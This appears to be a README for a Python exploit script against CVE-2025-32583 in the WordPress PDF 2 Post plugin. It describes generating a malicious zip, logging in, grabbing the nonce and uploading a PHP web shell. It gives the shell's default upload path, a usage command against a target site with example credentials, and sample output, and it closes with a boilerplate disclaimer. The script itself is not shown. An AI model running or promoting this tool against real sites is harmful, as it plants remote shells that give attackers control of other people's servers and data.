
# 🚨 CVE-2025-32583 — WordPress PDF 2 Post RCE Exploit

> **CRITICAL Vulnerability**  
> **CVE-ID:** CVE-2025-32583  
> **Severity:** 9.9 (CRITICAL)  
> **CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H`  

---

## 📖 Description

A vulnerability in the **PDF 2 Post** WordPress plugin (developed by termel) allows **Remote Code Inclusion (RCE)** due to **Improper Control of Generation of Code**.  
Affected versions: `<= 2.4.0`

The flaw allows **authenticated users** (even low-privilege users) to upload a `.zip` containing PHP code. Once extracted by the plugin, the malicious PHP file may be executed remotely via a public-facing uploads directory.

---

## ⚙️ Features

- ✅ Automatically generates malicious `Nxploited.zip`
- ✅ Logs in using WordPress credentials
- ✅ Extracts dynamic `nonce` token
- ✅ Uploads the payload
- ✅ Clean terminal output with status indicators

---

## 📂 Shell Location

Once the payload is uploaded, the PHP shell will be extracted into the WordPress uploads folder.  
🛠️ **Default path:**
```
/wp-content/uploads/YYYY/MM/nxploited.php
```
For example, if exploited in **May 2025**, the URL would be:
```
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
```
🕓 WordPress automatically organizes uploads by **year/month**, so ensure you check the correct folder based on the current date.

---

## 🧪 Usage

```bash
python CVE-2025-32583.py --help
```

### Example:
```bash
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
```

---

## 💡 Sample Output

```
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
```

---

## 📁 Script Name

```bash
CVE-2025-32583.py
```

---

## ⚠️ Disclaimer

This tool is intended **strictly for educational and authorized penetration testing purposes**.  
Any misuse of this code for unauthorized activities is strictly prohibited.  
The author bears **no responsibility** for any damage or misuse.

---

*By: Khaled_alenazi (Nxploited)*
